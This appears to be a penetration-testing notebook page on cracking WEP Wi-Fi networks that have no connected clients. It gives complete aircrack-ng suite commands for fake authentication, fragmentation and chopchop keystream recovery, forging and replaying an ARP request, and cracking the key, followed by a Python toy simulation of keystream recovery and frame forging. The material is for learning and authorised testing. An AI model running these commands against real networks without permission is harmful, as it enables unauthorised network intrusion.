refabr1k's Pentest Notebook
WEP Attack (OPEN) - Clientless

Used when the AP has no associated clients, so there is no client traffic to capture and replay. We first recover the PRGA keystream for a single IV (by fragmentation or chopchop), use packetforge-ng to "forge" an encrypted ARP request from that keystream, and replay the forged packet against the AP until enough IVs have been collected to crack the key. The WEP key itself is never needed to forge the packet.


Last updated 4 years ago


1. Fake authentication attack (MAC association)

As in the clients-connected scenario, first perform a fake authentication attack so that the AP associates our MAC address; an unassociated station's injected frames are simply discarded by the AP (see step 1 of the WEP Attack (OPEN) - Clients connected page).

2. Fragmentation attack / Korek Chop Chop

Either method yields the PRGA keystream for one IV. From that keystream we build an encrypted ARP request packet and replay it at the AP; each time the AP re-broadcasts the packet it uses a fresh IV, and those IVs are the traffic aircrack-ng needs to recover the WEP key.

(i) Fragmentation

The fragmentation attack does not recover the WEP key; it recovers the PRGA keystream (up to about 1500 bytes) for one IV, which packetforge-ng can then use to encrypt packets for injection.

aireplay-ng -5 -b <AP_MAC> -h <MY_MAC> wlan0mon

# aireplay-ng reports "Got RELAYED packet!!" each time the AP re-sends one of our fragment chains
# The keystream is saved to a file named <fragment-xxxx-xxx.xor> (this is the PRGA file for packetforge-ng -y)

(ii) Korek Chop Chop

The Korek chopchop attack decrypts a WEP packet without knowing the key. It recovers the keystream for that packet's IV, which also decrypts any other packet of equal or shorter length encrypted under the same IV, and lets us forge new packets for injection without the WEP key.

Chopchop can also be used to:

  • decrypt interesting packets

  • forge snmp packets

  • blind port scan of the network

  • create arp request to accelerate IV

To run the chopchop attack use the command below. aireplay-ng shows each candidate packet it captures; answer 'y' to use it (chopchop decrypts one byte per injected frame, so a short packet finishes faster).

aireplay-ng -4 -b <AP_MAC> -h <MY_MAC> wlan0mon
# packet filename - "replay_xxx-xxxx-xxxxxx.cap" (the decrypted packet)
# PRGA filename - "replay_xxx-xxxx-xxxxxx.xor" (keystream for packetforge-ng -y)

# Examine the decrypted packet to learn the network's IP scheme
tcpdump -s 0 -n -e -r replay_xxx-xxx-xxxxx.cap

# TAKE NOTE OF THE IP ADDRESSES: a broadcast ARP packet, for example, reveals the
# client and gateway IPs, which we reuse as source/destination in the forged ARP request

3. Packetforge-ng create Injection packets

packetforge-ng creates an encrypted packet for injection. It encrypts the packet with the PRGA keystream from the .xor file obtained above, so the WEP key is not needed. -0 builds an ARP request; -l and -k set the source and destination IP addresses (use the addresses found in the decrypted packet, or 255.255.255.255 for both if the IP scheme is unknown).

packetforge-ng -0 -a <AP_MAC> -h <MY_MAC> -l <source_address> -k <destination_address> -y <prga file> -w <inject.cap>

# Examine the created packet to confirm it decodes as a sensible ARP request
tcpdump -n -vvv -e -s0 -r inject.cap

4. Inject Packets to network (aireplay Interactive mode)

aireplay-ng reads the packet from the file and asks whether to use it; answer 'y' to start replaying it at the AP. The #Data count in airodump-ng should now rise rapidly (keep airodump-ng writing the capture with -w). From here the procedure is the same as in the clients-connected scenario.

aireplay-ng -2 -r <inject.cap> wlan0mon

5. Cracking WEP password

aircrack-ng -0 <airodump-writeout-file.cap>
# use the .cap written by airodump-ng -w; if it fails, let more IVs accumulate and run it again
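The following is an added worked example, not code from refabr1k's notebook or from the aircrack-ng project. It is a toy model of WEP (RC4 keystream XOR plaintext plus a CRC32 ICV) that walks through steps 2 and 3 above: recover a few keystream bytes from the fixed LLC/SNAP header of a sniffed ARP frame, extend them to a full 1500-byte keystream the way the fragmentation attack does (send fragments encrypted with what we already have, read the full keystream off the AP's relayed copy), and then forge an ARP request with a valid ICV that the AP accepts, all without the key. Every key, IV, MAC and frame in it is constructed for the demo; the simulated AP is a stand-in for a real one and skips 802.11 headers and key-index bytes.

```python
"""Toy WEP model (added example, not from the notebook or aircrack-ng): shows why a
recovered PRGA keystream is enough to forge valid frames without the WEP key.
All keys, IVs, MACs and frames are constructed for the demo."""
import struct
import zlib

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # fixed 8-byte header of every ARP frame


def rc4(key, length):
    """Plain RC4 (KSA + PRGA): returns `length` keystream bytes for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext):
    """WEP integrity check value: CRC32, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key, iv, plaintext):
    """Frame body = IV || RC4(IV||key) XOR (plaintext || ICV). Key-index byte omitted."""
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4(iv + wep_key, len(data)))


def wep_decrypt(wep_key, body):
    """Receiver side: the plaintext if the ICV verifies, else None (frame dropped)."""
    iv, ct = body[:3], body[3:]
    data = xor(ct, rc4(iv + wep_key, len(ct)))
    pt, tag = data[:-4], data[-4:]
    return pt if icv(pt) == tag else None


def recover_keystream(body, known_plaintext):
    """Core of chopchop/fragmentation: keystream = ciphertext XOR known plaintext.
    Returns (iv, keystream prefix as long as the known plaintext). No key involved."""
    return body[:3], xor(body[3:], known_plaintext)


def forge_frame(iv, keystream, plaintext):
    """packetforge-ng in miniature: any payload up to len(keystream)-4 bytes gets a
    valid ICV and is encrypted with the recovered keystream under the same IV."""
    data = plaintext + icv(plaintext)
    if len(data) > len(keystream):
        raise ValueError("payload longer than recovered keystream")
    return iv + xor(data, keystream)


class ToyAP:
    """Simulated AP (assumption): decrypts each fragment, drops the chain on any bad
    ICV, then re-encrypts the reassembled frame under a fresh IV (the RELAYED packet)."""
    def __init__(self, wep_key):
        self.key, self.iv_counter = wep_key, 0x100000

    def relay(self, fragments):
        parts = [wep_decrypt(self.key, f) for f in fragments]
        if any(p is None for p in parts):
            return None
        self.iv_counter += 1
        return wep_encrypt(self.key, self.iv_counter.to_bytes(3, "big"), b"".join(parts))


def fragmentation_attack(ap, iv, keystream, target_len=1500, max_frags=16):
    """aireplay-ng -5 in miniature: each round sends up to 16 fragments carrying
    plaintext we chose, encrypted with the keystream we already hold, and reads the
    longer keystream back off the AP's relayed copy. Grows 8 -> 68 -> 1028 -> 1500."""
    while len(keystream) < target_len:
        chunk = len(keystream) - 4                    # 4 bytes of each fragment go to its ICV
        total = min(chunk * max_frags, target_len - 4)
        payload = bytes((i * 37) & 0xFF for i in range(total))   # constructed filler
        frags = [forge_frame(iv, keystream, payload[i:i + chunk]) for i in range(0, total, chunk)]
        relayed = ap.relay(frags)
        if relayed is None:
            raise RuntimeError("AP dropped our fragments")
        iv, keystream = recover_keystream(relayed, payload + icv(payload))
    return iv, keystream


def build_arp_request(sender_mac, sender_ip, target_ip):
    """LLC/SNAP + 28-byte ARP request, the packet type packetforge-ng -0 builds."""
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      sender_mac, sender_ip, b"\x00" * 6, target_ip)
    return LLC_SNAP_ARP + arp


def demo():
    """Clientless chain: sniff one ARP, recover 8 keystream bytes, extend to 1500 by
    fragmentation, forge an ARP request the AP accepts. The attacker never touches
    wep_key. Returns True when the AP decrypts the forged frame with a good ICV."""
    wep_key = bytes.fromhex("0102030405")            # constructed 40-bit key (AP side only)
    ap = ToyAP(wep_key)
    sniffed = wep_encrypt(wep_key, b"\x0a\x0b\x0c",  # one ARP frame seen on the air (constructed)
                          build_arp_request(bytes.fromhex("001122334455"),
                                            b"\xc0\xa8\x01\x0a", b"\xc0\xa8\x01\x01"))
    iv, ks = recover_keystream(sniffed, LLC_SNAP_ARP)     # only 8 keystream bytes known so far
    iv, ks = fragmentation_attack(ap, iv, ks)             # now 1500 bytes under the AP's last IV
    wanted = build_arp_request(bytes.fromhex("66778899aabb"),
                               b"\xff\xff\xff\xff", b"\xff\xff\xff\xff")
    forged = forge_frame(iv, ks, wanted)                  # what aireplay-ng -2 would replay
    return wep_decrypt(wep_key, forged) == wanted


if __name__ == "__main__":
    print("forged ARP accepted by AP:", demo())
```

The .xor file written by aireplay-ng -4/-5 holds exactly what `fragmentation_attack` ends with: one IV and its keystream. That is why packetforge-ng needs no key, and why the forged packet is only valid under that one IV. WEP never rejects IV reuse, so aireplay-ng -2 can replay the same packet indefinitely, while each re-broadcast from the AP carries a fresh IV for aircrack-ng.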
